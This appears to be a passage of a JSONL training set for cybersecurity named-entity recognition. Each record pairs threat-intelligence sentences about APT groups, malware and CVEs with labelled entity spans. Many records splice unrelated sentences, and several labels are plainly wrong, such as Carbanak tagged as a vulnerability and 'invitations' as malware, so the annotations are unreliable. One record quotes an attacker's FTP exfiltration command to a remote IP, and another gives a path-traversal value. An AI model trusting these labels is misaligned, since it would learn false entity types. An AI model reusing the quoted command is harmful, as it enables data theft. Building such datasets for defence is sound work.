From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector .", "spans": {"TOOL: BalkanDoor": [[217, 227]], "TOOL: backdoor": [[228, 236]], "THREAT_ACTOR: APT33": [[318, 323]], "ORGANIZATION: aerospace sector": [[390, 406]]}, "info": {"id": "cyberner_stix_train_004492", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]], "VULNERABILITY: CVE-2017-7269": [[215, 228]], "ORGANIZATION: Microsoft": [[263, 272]], "TOOL: Internet Information Services": [[273, 302]], "TOOL: IIS": [[305, 308]]}, "info": {"id": "cyberner_stix_train_004493", "source": "cyberner_stix_train"}} {"text": "New KASPERAGENT Malware Campaign .", "spans": {"MALWARE: KASPERAGENT": [[4, 15]]}, "info": {"id": "cyberner_stix_train_004494", "source": "cyberner_stix_train"}} {"text": "The server is expected to send back executable code and one of the following commands :", "spans": {}, "info": {"id": "cyberner_stix_train_004495", "source": "cyberner_stix_train"}} {"text": "It may be that these submissions are made from the author ’ s machine , or that they submit it to a detection service that in turn submits to online malware databases . Madcap” is similar to the XAgent malware , but the former is focused on recording audio . 
The Rocket Kitten attacker group 's main attack vector is spear-phishing .", "spans": {"MALWARE: Madcap”": [[169, 176]], "MALWARE: XAgent": [[195, 201]], "THREAT_ACTOR: Rocket Kitten": [[263, 276]]}, "info": {"id": "cyberner_stix_train_004496", "source": "cyberner_stix_train"}} {"text": "The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": {"THREAT_ACTOR: hacking division": [[13, 29]], "ORGANIZATION: NSA": [[105, 108]], "FILEPATH: malicious attachments": [[197, 218]], "MALWARE: invitations": [[235, 246]], "MALWARE: drafts of the agenda": [[250, 270]]}, "info": {"id": "cyberner_stix_train_004497", "source": "cyberner_stix_train"}} {"text": "Information about all actions performed by Rotexy is logged in the local database and sent to the C & C . The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) . Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year .", "spans": {"MALWARE: Rotexy": [[43, 49]], "MALWARE: sidebar.exe": [[244, 255]], "MALWARE: dllhost.exe": [[267, 278]], "THREAT_ACTOR: Leafminer": [[299, 308]]}, "info": {"id": "cyberner_stix_train_004498", "source": "cyberner_stix_train"}} {"text": "CONTACTS – send text received from C & C to all user contacts . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . 
As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers .", "spans": {"THREAT_ACTOR: Sowbug": [[98, 104]], "TOOL: Felismus backdoor": [[157, 174]], "MALWARE: adobecms.exe": [[234, 246]], "MALWARE: CSIDL_WINDOWS\\debug": [[250, 269]], "MALWARE: public web shell": [[375, 391]], "THREAT_ACTOR: attackers": [[407, 416]]}, "info": {"id": "cyberner_stix_train_004499", "source": "cyberner_stix_train"}} {"text": "list harvesting . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . SecureWorks said the adversary group is abusing a previously undisclosed vulnerability in Japanese Software Asset Management system on endpoints .", "spans": {"THREAT_ACTOR: attackers": [[47, 56]], "ORGANIZATION: SecureWorks": [[186, 197]], "VULNERABILITY: previously undisclosed vulnerability": [[236, 272]]}, "info": {"id": "cyberner_stix_train_004500", "source": "cyberner_stix_train"}} {"text": "] 91 2020-03-04 http : //ora.carlaarrabitoarchitetto [ . RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and MiamiBeach” serve as the first beacon messages from the victim to the control server . 
In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) .", "spans": {"MALWARE: RocketMan!”": [[57, 68]], "MALWARE: MiamiBeach”": [[139, 150]], "MALWARE: PlugX": [[247, 252]], "MALWARE: Poison Ivy": [[257, 267]], "MALWARE: PIVY": [[270, 274]], "MALWARE: Trojan": [[337, 343]], "MALWARE: ChChes": [[353, 359]], "ORGANIZATION: Japan Computer Emergency Response Team Coordination Center": [[369, 427]], "ORGANIZATION: JPCERT": [[430, 436]]}, "info": {"id": "cyberner_stix_train_004502", "source": "cyberner_stix_train"}} {"text": "The operations division , supervised by Major Boris Alekseyevich Antonov , specialized in targeting organizations of intelligence interest through spear-phishing campaigns and the exploitation of stolen credentials .", "spans": {}, "info": {"id": "cyberner_stix_train_004503", "source": "cyberner_stix_train"}} {"text": "Sending information about the affected device The app receives configuration data from the C & C server , needed for displaying ads , and for stealth and resilience . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Create a screenshot and uploads it on the C2 .", "spans": {"ORGANIZATION: FireEye": [[175, 182]], "THREAT_ACTOR: APT41": [[242, 247]], "ORGANIZATION: financially": [[357, 368]], "TOOL: C2": [[434, 436]]}, "info": {"id": "cyberner_stix_train_004504", "source": "cyberner_stix_train"}} {"text": "] orgmediauploader [ . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time . 
The registrant supplied “ uglygorilla@163.com ” as an email address . Monitor for any attempts to enable scripts running on a system would be considered suspicious .", "spans": {"ORGANIZATION: civil society": [[130, 143]], "ORGANIZATION: media organizations": [[148, 167]], "EMAIL: uglygorilla@163.com": [[284, 303]], "TOOL: email": [[312, 317]]}, "info": {"id": "cyberner_stix_train_004505", "source": "cyberner_stix_train"}} {"text": "These loader samples all had compilation timestamps purporting to be from the 24th or the 25th of September , 2001 .", "spans": {"TOOL: loader": [[6, 12]]}, "info": {"id": "cyberner_stix_train_004506", "source": "cyberner_stix_train"}} {"text": "Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . It is not the first time Turla has used generic tools .", "spans": {"THREAT_ACTOR: CopyKittens": [[31, 42]], "TOOL: Metasploit": [[47, 57]], "TOOL: Mimikatz": [[180, 188]], "TOOL: Empire": [[255, 261]], "TOOL: PowerShell": [[266, 276]], "THREAT_ACTOR: Turla": [[339, 344]], "MALWARE: generic tools": [[354, 367]]}, "info": {"id": "cyberner_stix_train_004507", "source": "cyberner_stix_train"}} {"text": "Of these , the crucial one is the presence of PDB strings in the MiniDuke exploits .", "spans": {"TOOL: PDB": [[46, 49]], "MALWARE: MiniDuke": [[65, 73]]}, "info": {"id": "cyberner_stix_train_004508", "source": "cyberner_stix_train"}} {"text": "Therefore sending the file path “ ..\\..\\ secret_info.doc ”", "spans": {"FILEPATH: ..\\..\\ secret_info.doc": [[34, 56]]}, "info": {"id": "cyberner_stix_train_004509", "source": "cyberner_stix_train"}} {"text": "Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included 
organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda .", "spans": {"MALWARE: PinchDuke": [[43, 52]], "THREAT_ACTOR: Dukes": [[103, 108]], "ORGANIZATION: Ministry of Defense": [[167, 186]]}, "info": {"id": "cyberner_stix_train_004510", "source": "cyberner_stix_train"}} {"text": "Users should adopt best practices , while organizations should ensure that they balance the need for mobility and the importance of security . In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack . The link between these threat actors and FIN7 is still weak , but we decided to disclose a few hints regarding these in this blog post . Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": {"ORGANIZATION: National Bank": [[164, 177]], "ORGANIZATION: private banks": [[212, 225]], "THREAT_ACTOR: FIN7": [[324, 328]], "TOOL: Tarrask": [[420, 427]], "MALWARE: WarzoneRAT": [[536, 546]]}, "info": {"id": "cyberner_stix_train_004511", "source": "cyberner_stix_train"}} {"text": "Lookout customers are also protected from this threat on both Android and iOS . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . 
It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "SYSTEM: Android": [[62, 69]], "SYSTEM: iOS": [[74, 77]], "THREAT_ACTOR: Lotus Blossom": [[80, 93]], "VULNERABILITY: CVE-2014-6332": [[115, 128]], "MALWARE: Tran Duy Linh": [[199, 212]], "VULNERABILITY: CVE-2012-0158": [[215, 228]], "VULNERABILITY: exploit": [[229, 236]]}, "info": {"id": "cyberner_stix_train_004512", "source": "cyberner_stix_train"}} {"text": ". McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] . Between Jan. 1 – June 20 , 2023 , Mandiant identified more than 500 distinct victims that the KillNet collective has allegedly targeted with DDoS attacks .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[2, 33]], "ORGANIZATION: critical infrastructure": [[145, 168]], "ORGANIZATION: entertainment": [[171, 184]], "ORGANIZATION: finance": [[187, 194]], "ORGANIZATION: health care": [[197, 208]], "ORGANIZATION: telecommunications": [[215, 233]], "TOOL: FTP": [[294, 297]], "FILEPATH: JsuObf.exe": [[321, 331]]}, "info": {"id": "cyberner_stix_train_004513", "source": "cyberner_stix_train"}} {"text": "APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . 
Since January 2013 , we've been on the lookout for a possible RedOctober comeback .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aerospace": [[48, 57]], "ORGANIZATION: energy": [[62, 68]], "THREAT_ACTOR: threat actor": [[137, 149]], "THREAT_ACTOR: RedOctober": [[250, 260]]}, "info": {"id": "cyberner_stix_train_004514", "source": "cyberner_stix_train"}} {"text": "First , it will get the “ nativenumber ” variable from the “ telmark ” value of “ AndroidManifest.xml ” . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns .", "spans": {"SYSTEM: AndroidManifest.xml": [[82, 101]], "THREAT_ACTOR: TG-3390": [[122, 129]], "VULNERABILITY: CVE-2011-3544": [[144, 157]], "TOOL: HTTPBrowser backdoor": [[225, 245]], "VULNERABILITY: CVE-2010-0738": [[252, 265]], "TOOL: JBoss": [[287, 292]], "THREAT_ACTOR: PROMETHIUM": [[427, 437]], "THREAT_ACTOR: NEODYMIUM": [[442, 451]]}, "info": {"id": "cyberner_stix_train_004515", "source": "cyberner_stix_train"}} {"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . 
This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics .", "spans": {"VULNERABILITY: CVE-2017-11882": [[37, 51]], "THREAT_ACTOR: actors": [[86, 92]], "VULNERABILITY: (CVE-2017-11882)": [[146, 162]], "MALWARE: SYSCON": [[309, 315]], "FILEPATH: malicious Word documents": [[344, 368]]}, "info": {"id": "cyberner_stix_train_004516", "source": "cyberner_stix_train"}} {"text": "David Manouchehri released the information about the backdoor through its own Github account ( Pastebin ) and then apparently deleted it . we detected an ongoing campaign targeting a national data center . The Winnti malware was also found at these universities a few weeks prior to ShadowPad . In addition , individuals like Hack520 prove that these threat actors are composed of varied individuals who have their own set of expertise .", "spans": {"ORGANIZATION: Github": [[78, 84]], "ORGANIZATION: Pastebin": [[95, 103]], "MALWARE: The Winnti malware": [[206, 224]], "MALWARE: ShadowPad": [[283, 292]], "THREAT_ACTOR: Hack520": [[326, 333]]}, "info": {"id": "cyberner_stix_train_004517", "source": "cyberner_stix_train"}} {"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat and strengthening our confidence in attributing APT28 to the Russian government . 
For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"THREAT_ACTOR: APT28": [[147, 152]], "ORGANIZATION: Russian government": [[160, 178]], "MALWARE: FrozenCell": [[213, 223]], "MALWARE: Tawjihi 2016": [[250, 262]], "ORGANIZATION: students": [[296, 304]]}, "info": {"id": "cyberner_stix_train_004518", "source": "cyberner_stix_train"}} {"text": "The beginning of 2017 also brought a turning point in INDRIK SPIDER 's operation of Dridex . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[54, 67]], "TOOL: Dridex": [[84, 90]], "VULNERABILITY: exploit": [[143, 150]], "VULNERABILITY: CVE-2018-8120": [[156, 169]], "MALWARE: UACME": [[173, 178]]}, "info": {"id": "cyberner_stix_train_004519", "source": "cyberner_stix_train"}} {"text": "What follows are some of the features exhibited by SpyNote RAT . In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and Silence. ProxyBot.NET , which are described in detail in the report Silence: moving into the darkside . The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"MALWARE: SpyNote RAT": [[51, 62]], "THREAT_ACTOR: Silence": [[79, 86]], "TOOL: Silence.ProxyBot": [[124, 140]], "TOOL: Silence. ProxyBot.NET": [[145, 166]], "THREAT_ACTOR: Cobalt group": [[253, 265]]}, "info": {"id": "cyberner_stix_train_004520", "source": "cyberner_stix_train"}} {"text": "2016 From mid-2016 on , the cybercriminals returned to dynamic generation of lowest-level domains . 
The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": {"MALWARE: Zawgyi_Keyboard_L.zip": [[124, 145]], "MALWARE: setup.exe": [[169, 178]], "TOOL: Elise": [[239, 244]], "MALWARE: wincex.dll": [[247, 257]], "MALWARE: WannaCry": [[381, 389]], "MALWARE: WCry": [[396, 400]], "MALWARE: WanaCrypt0r": [[408, 419]], "ORGANIZATION: telecommunications": [[597, 615]], "ORGANIZATION: shipping": [[618, 626]], "ORGANIZATION: car manufacturers": [[629, 646]], "ORGANIZATION: universities": [[649, 661]], "ORGANIZATION: health care industries": [[666, 688]]}, "info": {"id": "cyberner_stix_train_004521", "source": "cyberner_stix_train"}} {"text": "We don't know how OurMine managed to access WikiLeaks 's DNS records , but past experience has shown that their typical modus operandi is simply to log in using their victim 's password . 
Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": {"ORGANIZATION: WikiLeaks": [[44, 53]]}, "info": {"id": "cyberner_stix_train_004522", "source": "cyberner_stix_train"}} {"text": "Multinational , multi-industry companies involved in the manufacture of textiles , chemicals , and electronics .", "spans": {"ORGANIZATION: Multinational": [[0, 13]], "ORGANIZATION: multi-industry companies involved in the manufacture of textiles": [[16, 80]], "ORGANIZATION: chemicals": [[83, 92]], "ORGANIZATION: electronics": [[99, 110]]}, "info": {"id": "cyberner_stix_train_004523", "source": "cyberner_stix_train"}} {"text": "This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps . If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite . The emails originated from the address dpptccb.dpp@msa.hinet.net , and contained the subject DPP's Contact Information Update . Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys .", "spans": {"TOOL: KeyBoy": [[132, 138]], "TOOL: configuration encoding algorithm": [[263, 295]], "TOOL: emails": [[389, 395]], "EMAIL: dpptccb.dpp@msa.hinet.net": [[424, 449]], "ORGANIZATION: Republican state lawmakers": [[513, 539]], "ORGANIZATION: Environmental Protection Administration": [[603, 642]]}, "info": {"id": "cyberner_stix_train_004524", "source": "cyberner_stix_train"}} {"text": "\" When BLU raised objections , Adups took immediate measures to disable that functionality on BLU phones , '' Adups says . 
The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security ( GDGS ) and has operated since at least 2012 .", "spans": {"ORGANIZATION: BLU": [[7, 10], [94, 97]], "ORGANIZATION: Adups": [[31, 36]], "MALWARE: POWERSTATS": [[281, 291]], "MALWARE: PowerShell backdoor": [[306, 325]], "THREAT_ACTOR: threat group": [[334, 346]], "THREAT_ACTOR: Dark Caracal": [[349, 361]], "ORGANIZATION: General Directorate of General Security": [[419, 458]], "ORGANIZATION: GDGS": [[461, 465]]}, "info": {"id": "cyberner_stix_train_004525", "source": "cyberner_stix_train"}} {"text": "The threat then executes “ svchost.exe ” , a PE file , which is actually a clean tool known as OLEVIEW.EXE .", "spans": {"FILEPATH: svchost.exe": [[27, 38]], "TOOL: PE": [[45, 47]], "FILEPATH: OLEVIEW.EXE": [[95, 106]]}, "info": {"id": "cyberner_stix_train_004526", "source": "cyberner_stix_train"}} {"text": "What makes SeaDuke special is that it was written in Python and designed to work on both Windows and Linux systems ; it is the first cross-platform tool we have seen from the Dukes .", "spans": {"MALWARE: SeaDuke": [[11, 18]], "TOOL: Python": [[53, 59]], "SYSTEM: Windows": [[89, 96]], "SYSTEM: Linux": [[101, 106]], "THREAT_ACTOR: Dukes": [[175, 180]]}, "info": {"id": "cyberner_stix_train_004527", "source": "cyberner_stix_train"}} {"text": "The Poseidon Group has been active , using custom code and evolving their toolkit since at least 2005 . 
These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions .", "spans": {"THREAT_ACTOR: Poseidon Group": [[4, 18]], "TOOL: custom code": [[43, 54]]}, "info": {"id": "cyberner_stix_train_004528", "source": "cyberner_stix_train"}} {"text": "Security analysts are typically equipped with the tools to defeat a good number of similar tricks during malware investigations . A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\… \" . DownUrlFile DownRunUrlFile RunUrlBinInMem UnInstall . All companies are subject to these .", "spans": {"ORGANIZATION: Palo Alto Networks": [[174, 192]], "TOOL: Elise": [[343, 348]], "ORGANIZATION: companies": [[474, 483]]}, "info": {"id": "cyberner_stix_train_004529", "source": "cyberner_stix_train"}} {"text": "Advertisement The VM also disguises the malicious activity , making it easier for the apps to infiltrate Google Play . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . AutoIt backdoor : A custom built backdoor written in the AutoIt scripting language . 
Or , they may go up against groups whose ideologies do not align with their own .", "spans": {"SYSTEM: Google Play": [[105, 116]], "MALWARE: DeltaAlfa": [[133, 142]], "TOOL: DDoS bot": [[155, 163]], "MALWARE: AutoIt backdoor": [[192, 207]], "ORGANIZATION: groups whose ideologies do not align with their own": [[305, 356]]}, "info": {"id": "cyberner_stix_train_004530", "source": "cyberner_stix_train"}} {"text": "We cannot confirm how the initial credentials were stolen in the 2016 incident ; however , later in the intrusion , Responder was deployed .", "spans": {"TOOL: Responder": [[116, 125]]}, "info": {"id": "cyberner_stix_train_004531", "source": "cyberner_stix_train"}} {"text": "Threat actors are increasingly focused on gaining control of legitimate credentials , especially credentials associated with highly privileged accounts .", "spans": {}, "info": {"id": "cyberner_stix_train_004532", "source": "cyberner_stix_train"}} {"text": "Netview — This tool enumerates networks .", "spans": {"TOOL: Netview": [[0, 7]]}, "info": {"id": "cyberner_stix_train_004533", "source": "cyberner_stix_train"}} {"text": "Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block While Sofacy ’s campaign delivering Zebrocy and Cannon remains active , Palo Alto Networks customers are protected from this threat in the following ways :", "spans": {"TOOL: C2": [[137, 139]], "THREAT_ACTOR: Sofacy": [[163, 169]], "MALWARE: Zebrocy": [[193, 200]], "MALWARE: Cannon": [[205, 211]], "ORGANIZATION: Palo Alto Networks": [[229, 247]]}, "info": {"id": "cyberner_stix_train_004534", "source": "cyberner_stix_train"}} {"text": "This malware-life-cycle has been observed to reoccur every few years , bringing new malware families into light . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . 
As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"THREAT_ACTOR: They": [[114, 118]], "ORGANIZATION: military": [[160, 168]], "MALWARE: WHITEOUT": [[324, 332]], "MALWARE: Contopee": [[339, 347]], "THREAT_ACTOR: APT38": [[374, 379]], "ORGANIZATION: bank": [[437, 441]]}, "info": {"id": "cyberner_stix_train_004535", "source": "cyberner_stix_train"}} {"text": "Reverse shell payload The reverse shell module is an external ELF file compiled by the attackers to run on Android . OceanLotus have been actively using since at least early 2018 . TA459 is a threat group believed to operate out of China that has targeted countries including Russia , Belarus , Mongolia , and others .", "spans": {"SYSTEM: Android": [[107, 114]], "THREAT_ACTOR: OceanLotus": [[117, 127]], "THREAT_ACTOR: TA459": [[181, 186]]}, "info": {"id": "cyberner_stix_train_004536", "source": "cyberner_stix_train"}} {"text": "Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud ; Cerberus is yet a new Trojan active in the wild ! AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . 
Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm .", "spans": {"MALWARE: Cerberus": [[142, 150]], "TOOL: ServHelper": [[222, 232]], "TOOL: FlawedAmmy": [[237, 247]], "THREAT_ACTOR: SectorJ04": [[264, 273]], "ORGANIZATION: CTU": [[396, 399]], "MALWARE: Mimikatz": [[424, 432], [467, 475]], "THREAT_ACTOR: BRONZE BUTLER": [[444, 457]]}, "info": {"id": "cyberner_stix_train_004537", "source": "cyberner_stix_train"}} {"text": "IOCs for this version were :", "spans": {"TOOL: IOCs": [[0, 4]]}, "info": {"id": "cyberner_stix_train_004538", "source": "cyberner_stix_train"}} {"text": "The DLL acts as a stub loader , which loads and executes the shell code .", "spans": {"TOOL: DLL": [[4, 7]], "TOOL: loader": [[23, 29]]}, "info": {"id": "cyberner_stix_train_004539", "source": "cyberner_stix_train"}} {"text": "In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world .", "spans": {"TOOL: NetTraveler": [[38, 49]], "VULNERABILITY: CVE-2012-0158": [[71, 84]], "TOOL: NetTraveler Trojan": [[100, 118]], "ORGANIZATION: engineering": [[165, 176]], "ORGANIZATION: transport": [[179, 188]], "ORGANIZATION: defense": [[193, 200]]}, "info": {"id": "cyberner_stix_train_004540", "source": "cyberner_stix_train"}} {"text": "We have found another instance of malware posing as the Super Mario Run Android app , and this time it has taken the form of DroidJack RAT ( remote access trojan ) . Multiple China-based cyber threat groups have targeted international media organizations in the past . 
Initial reports of the attacks , published April 26 ( in Hebrew ) by the Israel National Cyber Event Readiness Team ( CERT-IL ) and The Marker , confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel . Indicators can be automatically sent to your security tools , like secure email gateway and firewalls , to respond and block threats in realtime .", "spans": {"SYSTEM: Super Mario Run": [[56, 71]], "SYSTEM: Android": [[72, 79]], "MALWARE: DroidJack RAT": [[125, 138]], "THREAT_ACTOR: cyber threat groups": [[187, 206]], "ORGANIZATION: international media organizations": [[221, 254]], "ORGANIZATION: Israel National Cyber Event Readiness Team": [[342, 384]], "ORGANIZATION: CERT-IL": [[387, 394]], "ORGANIZATION: Marker": [[405, 411]], "TOOL: email": [[472, 477]], "ORGANIZATION: Ben-Gurion University": [[490, 511]], "TOOL: security tools": [[602, 616]], "TOOL: secure email gateway": [[624, 644]], "TOOL: firewalls": [[649, 658]]}, "info": {"id": "cyberner_stix_train_004541", "source": "cyberner_stix_train"}} {"text": "So I don ’ t know what kind of files will be executed , but they could be malicious or advertising files . In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities . APT1 is a single organization of operators that has conducted a cyber espionage campaign against a broad range of victims since at least 2006 . 
The final stage backdoor connects to two servers , one in Panama and one in Turkey to receive the instructions from the attackers .", "spans": {"TOOL: Octopus": [[172, 179]], "ORGANIZATION: diplomatic entities": [[200, 219]], "THREAT_ACTOR: APT1": [[222, 226]], "THREAT_ACTOR: attackers": [[486, 495]]}, "info": {"id": "cyberner_stix_train_004542", "source": "cyberner_stix_train"}} {"text": "Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer Value : %AppData%\\Platform\\sslwin.exe .", "spans": {"FILEPATH: %AppData%\\Platform\\sslwin.exe": [[79, 108]]}, "info": {"id": "cyberner_stix_train_004543", "source": "cyberner_stix_train"}} {"text": "Logs collected by Check Point researchers show that every day Gooligan installs at least 30,000 apps fraudulently on breached devices or over 2 million apps since the campaign began . Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands . The global variable value dword_72DBB588 is always 0 because the value is not initialized ( we can check it by is_loaded API ) This markup becomes unescaped , causing arbitrary markup to be injected into the document .", "spans": {"ORGANIZATION: Check Point": [[18, 29]], "MALWARE: Gooligan": [[62, 70]], "TOOL: Remexi": [[184, 190]], "THREAT_ACTOR: Cadelle": [[231, 238]], "TOOL: is_loaded API": [[412, 425]], "VULNERABILITY: This markup becomes unescaped , causing arbitrary markup to be injected into the document": [[428, 517]]}, "info": {"id": "cyberner_stix_train_004544", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : d30b8468d16b631cafe458fd94cc3196 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: d30b8468d16b631cafe458fd94cc3196": [[11, 43]]}, "info": {"id": "cyberner_stix_train_004545", "source": "cyberner_stix_train"}} {"text": "During our extended threat hunting , we uncovered 11 apps on the Google Play store that contain a malicious yet dormant SDK related to “ Agent Smith ” actor . 
In this blog post , we discussed two separate malware variations that behave in very similar ways and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains . Dexphot : aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": {"SYSTEM: Google Play store": [[65, 82]], "MALWARE: Agent Smith": [[137, 148]], "MALWARE: Dexphot": [[425, 432]], "FILEPATH: aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152": [[435, 499]]}, "info": {"id": "cyberner_stix_train_004546", "source": "cyberner_stix_train"}} {"text": "Once TERBIUM has a foothold in the organization , its infection chain starts by writing an executable file to disk that contains all the components required to carry out the data-wiping operation . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"THREAT_ACTOR: TERBIUM": [[5, 12]], "ORGANIZATION: CSIS": [[248, 252]], "MALWARE: Carbanak": [[286, 294]], "ORGANIZATION: customers": [[324, 333]]}, "info": {"id": "cyberner_stix_train_004547", "source": "cyberner_stix_train"}} {"text": "Our malware analysts Nikita Buchka and Mikhail Kuzin can easily name 11 families of such Trojans . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . 
